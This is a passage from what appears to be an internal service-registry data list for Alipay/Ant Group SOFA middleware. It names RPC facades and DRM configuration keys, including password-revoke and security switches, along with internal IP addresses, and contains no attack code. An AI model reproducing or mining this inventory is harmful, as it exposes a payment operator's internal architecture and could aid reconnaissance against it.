#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:creditvisaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebAvailableCardListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.biz.mutual.service.GenCertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityasset.common.service.facade.api.TransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testgw.common.service.facade.shadowuser.usercreate.ShadowUserOpenSubCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mrchiscore:name=com.alipay.mrchiscore.biz.order.function.BizDrmSubscribe.productRouteRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbclaimprod.common.customer.facade.ClaimVisitCustomerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitTopicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.rest.PrivilegeServiceRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.SmartPayBoxRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:guardianconsoleUSA@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.kb.EleAccountActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.task.TaskExecuteCBFacade:1.0:intimatepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.release,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-databus-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirecenter.common.service.facade.api.OrderModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttune.common.service.facade.backend.CaseFieldService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zpaascore.servcie.facade.PaasCoreCallbackServiceFacade:1.0:nfccCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.capacitystudio.common.service.facade.portrait.AppZonePortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BUDGET_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.44.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.cif.client.drm.ServiceInvokeReportConfigSwitch.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.152.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_PRIVATE_CLOUD_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_PCARD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccaplat_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.specialTemplateAssignRuleStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcalm-monthplan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.biz.event.service.EventProcessorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.huntshadow.HsAreaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.EarnLuckyPointTaskPlugin:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.needQueryZhx,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapitool.facade.ugw.UnifygwServiceSecurityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.demo.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchstm_assetReqOrderPrAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MemberBenefitMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.MPcardGzoneManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkopermng.common.service.facade.screditgrowup.api.TaskTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientSubAgreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KGMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.aip.FundFixedDecisionWrapFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.KbTenantUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.BudgetConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.OssServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.CampaignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.AssetTypeQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenCommentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.adminconsole.scope.AuthScopeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bioperation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zpaascore.servcie.facade.PaasCoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.conf.facade.XViewConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALISISAI#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.211.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.financialfestival.api.NewDevelopmentFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamRoleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.partner.repository.FmpWithdrawConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinflux.common.service.facade.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.thirdpart.service.facade.DocPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbcontent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_DWDSSP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbwms.common.service.facade.service.WmsSupplierService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mfrontgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.permission.v2.OperatorShopPermissionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdp.common.service.facade.simple.DeliverFacade:1.0:ucdpcore-finance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.4.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imerchopmng.globalsite.common.service.facade.api.IsvQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.deepinsight.facade.TaijiTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.biz.service.impl.AlcorpTransactionTemplate:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.PimStandardLogAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingMessageServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.MasterKeyInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.instproduct.InstProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.creative.CreativeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.grow.api.GrowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessCancleCallbackNew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.extension.service.facade.api.RecruitOutBizQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.88.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.infosec.biz.backtracking.OdpsUserSearchTaskManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.MobileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reading.common.service.facade.live.api.LiveUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZCBMARKETCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_EC_MWALLETMNG_WIDGET_RECORD_TASK_DATA_CLEAR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.192.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.decoration.PublicDecorationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.cod.facade.CodLogistictsControlFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.relation.CardRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.punishcenter.strategy.PunishStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.analyze.alpharisk.core.infocode.drm.DrmUctInfocodeEngineResource.strategyTopNumStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.researchprod.HqResearchDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpayplatform.common.service.facade.api.consult.PayAssetConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DowngradeSwitchConfig.skipGuideQueryStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.artisan.extend.api.ComponentMaterialFacade:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.InvokerAuthManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdsriskdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:xbricks@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.CreditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.WriteoffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.RecommendOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.acapi.sofarest.OpenapiSofaRest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.biz.service.meta.command.BizInfluenceHttpService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_O_CREATEWORKTASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_C_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifaatam.common.service.facade.wagu.CertificateClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.dal.sync.SyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_DEFAULT_UNIFORM_EVENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.closeWashAndTryingModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.auth.client.service.UserRoleService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.robot.PushMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:twcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.12.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.mpoint.facade.MpointMonthBillQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:isupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilefun.common.service.facade.ImageRiskTextManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.CodeScanCacheQueryFacade:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.ProductAppRelFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.132.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.arater.common.service.facade.RateImpressionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.syncUserIdExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.testgw.common.service.facade.shadowuser.initdevice.ShadowInitDeviceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.ZeroToleranceErrorCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressRuleMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.desensitivity.DesensitivityConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.cfgriskctrl.AppRuleObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.insttrade.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.gotone.common.service.api.SendWangWangService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promokernel.common.manage.facade.api.CampGrayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.SignTestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.settleprod.service.facade.agency.PartnerAddressFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.ScenarioCloneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grmcore.common.service.facade.api.MailClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleQueryFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.delivery.ActivityApplyRangeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:argo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesecurity.common.service.api.otp.OtpServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.unifyroute.SkyGateInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:dockerlabapp#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoaftermarket.common.service.common.AutoPartFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.batchDeductGrayShardIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_B_CA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.needLoadTableNameList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcloanmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamTemplateApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.UIHlwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:groupFundsCloseExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APPXAGG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcheck.common.service.facade.bizcheck.PcreditCheckCardPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.channel.config.SettleDepositConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.LocalProxyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffStockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.GreyListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.RulePartnerRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.service.AutoTransInProtocolQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_VOSTRO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordercore.product.common.service.api.PdSignRuleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_COMM_MESSAGE_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.kbticketcenter.KbtBackendVoucherSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.AgreementpayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.ChkUserAuditOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.CreateAuditRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.promoworkbench.PageDesinConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.merchant.MerchantRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.feizhuAgencyPayeeAccountConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.ProductLineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.integration.prodtrans.ProdtransSyncRecordFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.158.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promox.facade.feature.FeatureAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.PromoAlgoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityPlanSubjectQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.stageopenapi.StageInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.crowdallocation.CrowdAllocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbaudit.common.service.facade.callback.QueryCompetitorShopItemCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.dacuprod.ActivityPreplanServiceFacade:1.0@DEFAULT#@